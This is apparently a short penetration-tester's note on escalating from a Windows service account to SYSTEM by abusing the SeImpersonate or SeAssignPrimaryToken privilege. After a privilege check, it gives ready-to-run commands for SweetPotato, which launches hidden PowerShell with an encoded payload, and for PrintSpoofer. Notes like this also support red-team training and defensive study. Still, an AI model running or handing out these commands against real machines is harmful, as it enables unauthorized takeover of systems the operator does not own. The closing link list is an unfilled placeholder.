Secondary Categories: 02-Windows Internals, 02-Privilege Escalation
There are several methods to leverage this permission on a Windows system. The following permission conditions: SeImpersonate
or SeAssignPrimaryToken
We can identify if the current user has these permissions by running the following command:
whoami /priv
Sweet Potato
This tool contains various privilege escalation techniques that allow the attacker to go from a service account to SYSTEM. It leverages the following methods:
- Orignal RottenPotato code and exploit by @foxglovesec
- Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
- PrintSpoofer discovery and original exploit by @itm4n
- EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
# Exploiting a host with SweetPotato
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"
PrintSpoofer
First ensure the print spooler service is running using the following powershell or using windows services.
Get-Service Spooler
After transferring the binary or leveraging a COFF file you can execute the following to escalate privileges.
.\PrintSpoofer.exe -i -c powershell
Also Check Out:
- PLACEHOLDER